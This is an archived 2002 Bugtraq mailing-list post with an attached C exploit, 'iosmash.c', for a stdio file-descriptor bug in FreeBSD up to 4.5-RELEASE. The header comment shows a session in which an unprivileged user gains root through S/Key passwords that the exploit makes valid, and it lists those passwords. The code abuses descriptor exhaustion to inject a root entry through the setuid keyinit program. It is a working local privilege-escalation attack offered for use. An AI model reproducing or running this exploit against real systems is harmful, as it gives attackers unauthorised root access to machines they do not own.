[25222] in bugtraq
cheers
daemon@ATHENA.MIT.EDU (KF)
Tue Apr 23 13:45:52 2002
Message-ID: <3CC4FE08.9060902@snosoft.com>
Date: Mon, 22 Apr 2002 23:24:08 -0700
From: KF <dotslash@snosoft.com>
MIME-Version: 1.0
To: bugtraq <bugtraq@securityfocus.org>,
vuln-dev <vuln-dev@security-focus.com>
Content-Type: multipart/mixed;
boundary="------------010008030401040105050200"
--------------010008030401040105050200
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
http://www.phased.home.ro/iosmash.c
-KF
--------------010008030401040105050200
Content-Type: text/plain;
name="iosmash.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="iosmash.c"
/*
phased/b10z
phased@snosoft.com
23/04/2002
stdio kernel bug in All releases of FreeBSD up to and including 4.5-RELEASE
decided to make a trivial exploit to easily get root :)
> id
uid=1003(phased) gid=999(phased) groups=999(phased)
> ./iosmash
Adding phased:
<--- HIT CTRL-C --->
> su
s/key 98 snosoft2
Password:MASS OAT ROLL TOOL AGO CAM
xes#
this program makes the following skeys valid
95: CARE LIVE CARD LOFT CHIC HILL
96: TESS OIL WELD DUD MUTE KIT
97: DADE BED DRY JAW GRAB NOV
98: MASS OAT ROLL TOOL AGO CAM
99: DARK LEW JOLT JIVE MOS WHO
http://www.snosoft.com
cheers Joost Pol
*/
#include <stdio.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
while(dup(1) != -1);
close(2);
execl("/usr/bin/keyinit",
"\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n");
}
--------------010008030401040105050200--
